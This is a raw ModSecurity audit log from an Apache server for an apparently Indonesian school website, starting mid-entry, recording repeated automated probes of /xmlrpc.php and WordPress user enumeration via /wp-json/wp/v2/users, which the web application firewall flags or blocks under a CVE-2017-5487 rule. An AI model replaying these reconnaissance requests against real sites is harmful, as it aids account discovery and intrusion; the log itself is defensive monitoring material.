Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759789430 2127 (- - -) Stopwatch2: 1747445759789430 2127; combined=981, p1=326, p2=623, p3=0, p4=0, p5=31, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47ccda63-Z-- --901c163a-A-- [17/May/2025:08:36:04 +0700] aCfoBBKi5m5upc8uMd6iOQAAANg 103.236.140.4 44214 103.236.140.4 8181 --901c163a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --901c163a-C-- demo.sayHello --901c163a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --901c163a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445764707575 4754 (- - -) Stopwatch2: 1747445764707575 4754; combined=3593, p1=432, p2=2952, p3=25, p4=22, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --901c163a-Z-- --01ccb607-A-- [17/May/2025:08:36:06 +0700] aCfoBum4kjNN-hEbWjJBJwAAAE0 103.236.140.4 44216 103.236.140.4 8181 --01ccb607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01ccb607-C-- demo.sayHello --01ccb607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ccb607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445766946751 3732 (- - -) Stopwatch2: 1747445766946751 3732; combined=2834, p1=355, p2=2289, p3=18, p4=21, p5=90, sr=56, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ccb607-Z-- --7734f705-A-- [17/May/2025:08:36:09 +0700] aCfoCem4kjNN-hEbWjJBKQAAAE8 103.236.140.4 44224 103.236.140.4 8181 --7734f705-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7734f705-C-- demo.sayHello --7734f705-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7734f705-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445769493211 6659 (- - -) Stopwatch2: 1747445769493211 6659; combined=4691, p1=579, p2=3870, p3=36, p4=39, p5=99, sr=80, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7734f705-Z-- --a55d9511-A-- [17/May/2025:08:36:29 +0700] aCfoHem4kjNN-hEbWjJBKgAAAFE 103.236.140.4 44228 103.236.140.4 8181 --a55d9511-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a55d9511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a55d9511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445789105277 15507 (- - -) Stopwatch2: 1747445789105277 15507; combined=25749, p1=482, p2=903, p3=0, p4=0, p5=12197, sr=82, sw=1, l=0, gc=12166 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a55d9511-Z-- --1685ee28-A-- [17/May/2025:08:36:36 +0700] aCfoJATOsBn9MSWb6WJuwwAAAIE 103.236.140.4 44232 103.236.140.4 8181 --1685ee28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1685ee28-C-- demo.sayHello --1685ee28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1685ee28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445796090285 6614 (- - -) Stopwatch2: 1747445796090285 6614; combined=4797, p1=592, p2=3964, p3=39, p4=43, p5=96, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1685ee28-Z-- --2eb0cc34-A-- [17/May/2025:08:36:51 +0700] aCfoMxKi5m5upc8uMd6iPAAAAMQ 103.236.140.4 44236 103.236.140.4 8181 --2eb0cc34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2eb0cc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eb0cc34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445811558592 3182 (- - -) Stopwatch2: 1747445811558592 3182; combined=1400, p1=473, p2=895, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eb0cc34-Z-- --1c243e17-A-- [17/May/2025:08:36:55 +0700] aCfoN-m4kjNN-hEbWjJBLAAAAFQ 103.236.140.4 44240 103.236.140.4 8181 --1c243e17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c243e17-C-- demo.sayHello --1c243e17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c243e17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445815176111 6530 (- - -) Stopwatch2: 1747445815176111 6530; combined=4734, p1=617, p2=3840, p3=38, p4=43, p5=131, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c243e17-Z-- --a6bae97e-A-- [17/May/2025:08:37:05 +0700] aCfoQem4kjNN-hEbWjJBLgAAAFY 103.236.140.4 44244 103.236.140.4 8181 --a6bae97e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a6bae97e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bae97e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445825799493 3537 (- - -) Stopwatch2: 1747445825799493 3537; combined=1493, p1=512, p2=944, p3=0, p4=0, p5=37, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bae97e-Z-- --79c8031f-A-- [17/May/2025:08:37:14 +0700] aCfoSum4kjNN-hEbWjJBMgAAAEE 103.236.140.4 44254 103.236.140.4 8181 --79c8031f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79c8031f-C-- demo.sayHello --79c8031f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79c8031f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445834356212 6621 (- - -) Stopwatch2: 1747445834356212 6621; combined=4793, p1=616, p2=3936, p3=40, p4=42, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79c8031f-Z-- --c0059439-A-- [17/May/2025:08:38:09 +0700] aCfogem4kjNN-hEbWjJBNQAAAEc 103.236.140.4 44260 103.236.140.4 8181 --c0059439-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0059439-C-- demo.sayHello --c0059439-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0059439-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445889471698 5777 (- - -) Stopwatch2: 1747445889471698 5777; combined=4155, p1=568, p2=3368, p3=32, p4=34, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0059439-Z-- --d6951436-A-- [17/May/2025:08:39:05 +0700] aCfouem4kjNN-hEbWjJBNwAAAEg 103.236.140.4 44264 103.236.140.4 8181 --d6951436-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6951436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6951436-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445945282459 3269 (- - -) Stopwatch2: 1747445945282459 3269; combined=1355, p1=468, p2=857, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6951436-Z-- --17589e7c-A-- [17/May/2025:08:39:11 +0700] aCfov-m4kjNN-hEbWjJBOQAAAEo 103.236.140.4 44268 103.236.140.4 8181 --17589e7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17589e7c-C-- demo.sayHello --17589e7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17589e7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445951095073 5370 (- - -) Stopwatch2: 1747445951095073 5370; combined=4024, p1=525, p2=3283, p3=29, p4=31, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17589e7c-Z-- --57c2c447-A-- [17/May/2025:08:43:22 +0700] aCfpunyxdQCiyU1ENFcnzwAAAAg 103.236.140.4 44346 103.236.140.4 8181 --57c2c447-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57c2c447-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57c2c447-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446202154279 3227 (- - -) Stopwatch2: 1747446202154279 3227; combined=1413, p1=475, p2=897, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57c2c447-Z-- --7e9fb006-A-- [17/May/2025:08:43:29 +0700] aCfpwQTOsBn9MSWb6WJuyQAAAI0 103.236.140.4 44350 103.236.140.4 8181 --7e9fb006-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e9fb006-C-- demo.sayHello --7e9fb006-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e9fb006-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446209794298 5577 (- - -) Stopwatch2: 1747446209794298 5577; combined=4119, p1=552, p2=3409, p3=23, p4=24, p5=65, sr=76, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e9fb006-Z-- --e6247f3e-A-- [17/May/2025:08:43:46 +0700] aCfp0um4kjNN-hEbWjJBRgAAAEc 103.236.140.4 44354 103.236.140.4 8181 --e6247f3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6247f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6247f3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446226530222 2796 (- - -) Stopwatch2: 1747446226530222 2796; combined=1232, p1=424, p2=778, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6247f3e-Z-- --3c00bc1d-A-- [17/May/2025:08:43:52 +0700] aCfp2Om4kjNN-hEbWjJBRwAAAEY 103.236.140.4 44358 103.236.140.4 8181 --3c00bc1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c00bc1d-C-- demo.sayHello --3c00bc1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c00bc1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446232155377 6668 (- - -) Stopwatch2: 1747446232155377 6668; combined=4749, p1=585, p2=3942, p3=38, p4=39, p5=86, sr=76, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
